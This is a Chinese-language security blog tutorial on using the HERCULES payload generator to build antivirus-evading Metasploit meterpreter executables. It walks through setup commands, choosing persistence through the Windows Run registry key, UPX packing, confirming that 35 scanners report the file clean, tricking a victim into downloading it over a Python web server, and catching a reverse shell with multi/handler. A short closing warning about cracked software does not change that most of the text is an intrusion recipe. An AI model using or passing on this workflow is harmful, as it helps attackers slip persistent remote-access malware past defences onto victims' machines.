安全路透社
当前位置:安全路透社 > 网络转载 > 正文

如何用HERCULES绕过杀软

*本文原创作者:noosec

HERCULES是一个由Go语言开发的可以绕过防病毒软件的可定制的有效载荷生成器,只需简单的设置,就可以生成用于Metasploit的免杀payload,经测试,可完美绕过当前主流防病毒软件查杀检测。

Let  us  lean how to use it  !

测试环境:

kali    linux   2.0       :   192.168.1.100

windows7   x64       :    192.168.1.140

测试流程:

1.下载配置go语言环境;

2.下载初始化HERCULES ;

3.生成免杀exp;

4.诱使受害者下载执行exp

5.Metasploit监听并获取权限

(一)下载配置go语言环境

在kali linux 攻击机中安装go 语言环境。

  1.下载源码包:

wget -c https://storage.googleapis.com/golang/go1.8.3.linux-amd64.tar.gz

2.解压文件至/usr/local

tar -C /usr/local -xzf go1.8.3.linux-amd64.tar.gz

3.设置环境变量(让命令go有效)

cd ~
vim .profile

在文件未必追加:

export PATH=$PATH:/usr/local/go/bin

保存退出

使当前配置文件生效

.  .profile

4.测试:

go version

(二)下载初始化HERCULES

从github上下载HERCULES源文件:

git clone https://github.com/noosec/HERCULES.git

下载HERCULES相关的资源文件

wget -c https://github.com/fatih/color

初始化HERCULES

go get github.com/fatih/color

go run Setup.go

69ebfe93-3e99-49e0-ad48-cd1a2e452818.png

e34d6985-5a56-4284-afc1-e01c20c67ef5.png

(三)生成免杀payload

1.选择生成Payload:

运行当前目录下HERCULES,选择第一个选项:

651a5349-dcdc-4128-b158-7aa8016b1985.png

2.选择Tcp类型的 Meterpreter  Payload

#WHAT IS UPX ?

UPX(Ultimate Packer for Executables)是一款免费的开源可执行封装程序,支持来自不同操作系统的多种文件格式。 UPX简单地将二进制文件压缩,在运行时将二进制打包(解压缩)本身打包到内存中。

#WHAT IS "AV EVASION SCORE" ?

AV Evasion Score是确定有效载荷反病毒绕过能力有效性的一个比例尺(1/10),1代表通过AV软件的可能性很低。

使用特殊功能并用upx打包有效载荷可减少AV Evasion Score

选择Tcp 类型的 Payload ,输入 1,回车

1d21b306-ef6b-422c-b0ac-da5051c5cf55.png

3.进入payload参数设置界面:

输入反弹回连的IP地址,端口号:

#Persistence:

持久性功能将运行的二进制文件添加到windows启动注册表(CurrentVersion / Run ) 以进行持续访问。

#Migration:

此函数触发一个循环,尝试迁移到远程进程,直到成功迁移为止

以下设置可根据自已需要设置,这里我选择了使用持久性功能,增加了 by pass av 相关函数功能payload 并使用了 upx 加壳,生成了文件名为creak.exe的payload反弹exe程序。

25a3208f-e43e-4ceb-b33e-d53296cd8803.png

经过以上设置,回车之后,会在当前用户主目录下生成相关免杀exe程序:

414899d8-162e-4a5e-a170-c4c708447a58.png

对于相关程序是否免杀,我们可以通过在线av查杀网站进行测试,通过35个查杀软件扫描,全部扫描的结果为clean:

b6813879-c488-473c-8910-ba17ce2c48d6.png

国内某杀软件 :

9aa280bb-0414-4d31-b336-7681fb1807ec.png

(四)Win7下载生成的exe

在Kali Linux 中 exe文件所在目录执行,将当前目录文件共享:

python -m SimpleHTTPServer

win7 中使用浏览器访问:http://192.168.1.100/creak.exe,下载文件到本地

(五)Metasploit监听并获取权限

使用msf,加载以下两个模块,设置相关参数,并等待连接:

exploit/multi/handler 

windows/meterpreter/reverse_tcp

98886952-ecab-47fa-886f-0fe7918c69bb.png

在win7上运行creak.exe,msf 成功收到反弹shell。

303db843-483b-41e2-8a55-2392587cfda7.png

END :

在测试过程中,当运行生成的Payload之后,杀毒软件可能会基于行为分析,将生成的payload识别为木马程序,当遇到这种情况后,只需使用HERCULES重新生成一次,就可 by pass this  AV 了。

在国内,各种软件下载网站,各种破解程序多不胜数,这些软件都有一个共性,在运行的时候,建议关闭杀毒软件,亦或是建议先使用杀毒软件进行一次云查杀,再告诉用户,此软件是干净、无毒的,建立关闭杀毒软件,再运行相关程序文件,但结果可能是,你运行了一个木马程序。

*本文原创作者:noosec

未经允许不得转载:安全路透社 » 如何用HERCULES绕过杀软

赞 (0)
分享到:更多 ()

评论 0

评论前必须登录!

登陆 注册